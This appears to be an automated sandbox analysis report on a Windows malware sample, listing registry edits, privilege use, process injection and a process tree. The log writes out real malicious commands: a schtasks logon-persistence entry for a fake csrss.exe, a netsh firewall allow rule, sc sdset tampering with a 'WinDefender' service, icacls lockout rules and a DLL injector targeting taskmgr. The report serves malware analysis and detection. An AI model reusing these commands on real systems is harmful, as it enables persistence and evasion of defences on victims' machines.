Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-2632 = "Norfolk Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\611E.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2132103209-3755304320-2959162027-1000_Classes\Local Settings C:\containerProviderhost\runtimenetSvc.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\containerProviderhost\runtimenetSvc.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\csrss.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3444 wrote to memory of 3640 N/A N/A C:\Windows\system32\cmd.exe
PID 3444 wrote to memory of 3640 N/A N/A C:\Windows\system32\cmd.exe
PID 3640 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3640 wrote to memory of 5048 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3444 wrote to memory of 4760 N/A N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 3444 wrote to memory of 4760 N/A N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 3444 wrote to memory of 4760 N/A N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4760 wrote to memory of 1364 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 1364 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Windows\SysWOW64\icacls.exe
PID 1364 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Windows\SysWOW64\icacls.exe
PID 1364 wrote to memory of 4088 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Windows\SysWOW64\icacls.exe
PID 1364 wrote to memory of 5952 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 1364 wrote to memory of 5952 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 1364 wrote to memory of 5952 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 5952 wrote to memory of 4116 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\Temp\9B28.exe
PID 4116 wrote to memory of 388 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 4116 wrote to memory of 388 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 4116 wrote to memory of 388 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 388 wrote to memory of 3500 N/A C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe
PID 4116 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe
PID 4116 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe
PID 4116 wrote to memory of 1936 N/A C:\Users\Admin\AppData\Local\Temp\9B28.exe C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe
PID 3444 wrote to memory of 5420 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEC9.exe
PID 3444 wrote to memory of 5420 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEC9.exe
PID 3444 wrote to memory of 5420 N/A N/A C:\Users\Admin\AppData\Local\Temp\DEC9.exe
PID 3444 wrote to memory of 5812 N/A N/A C:\Windows\system32\cmd.exe
PID 3444 wrote to memory of 5812 N/A N/A C:\Windows\system32\cmd.exe
PID 5812 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5812 wrote to memory of 1652 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 3444 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe
PID 3444 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe
PID 3444 wrote to memory of 528 N/A N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe
PID 528 wrote to memory of 5644 N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 5644 N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 528 wrote to memory of 5644 N/A C:\Users\Admin\AppData\Local\Temp\EB1F.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3444 wrote to memory of 5700 N/A N/A C:\Users\Admin\AppData\Local\Temp\F88E.exe
PID 3444 wrote to memory of 5700 N/A N/A C:\Users\Admin\AppData\Local\Temp\F88E.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe

"C:\Users\Admin\AppData\Local\Temp\0b31dc8d9eeaa4a6803873a6c1380c72.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8491.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\9B28.exe

C:\Users\Admin\AppData\Local\Temp\9B28.exe

C:\Users\Admin\AppData\Local\Temp\9B28.exe

C:\Users\Admin\AppData\Local\Temp\9B28.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\f12340f9-b0e6-42e3-a341-afc21e6d6dfd" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\9B28.exe

"C:\Users\Admin\AppData\Local\Temp\9B28.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\9B28.exe

"C:\Users\Admin\AppData\Local\Temp\9B28.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe

"C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe"

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe

"C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build2.exe"

C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe

"C:\Users\Admin\AppData\Local\a0467e72-fa4e-4f69-8f9a-675cae98fa75\build3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3500 -ip 3500

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3500 -s 2220

C:\Users\Admin\AppData\Local\Temp\DEC9.exe

C:\Users\Admin\AppData\Local\Temp\DEC9.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\E33F.bat" "

C:\Windows\system32\reg.exe

reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\F88E.exe

C:\Users\Admin\AppData\Local\Temp\F88E.exe

C:\Users\Admin\AppData\Local\Temp\EB1F.exe

"C:\Users\Admin\AppData\Local\Temp\EB1F.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Users\Admin\AppData\Local\Temp\DBD.exe

C:\Users\Admin\AppData\Local\Temp\DBD.exe

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\5343.exe

C:\Users\Admin\AppData\Local\Temp\5343.exe

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Users\Admin\AppData\Local\Temp\611E.exe

C:\Users\Admin\AppData\Local\Temp\611E.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\containerProviderhost\lSHV2TIIXWH4jLBRX.vbe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe

C:\Windows\SysWOW64\cmd.exe

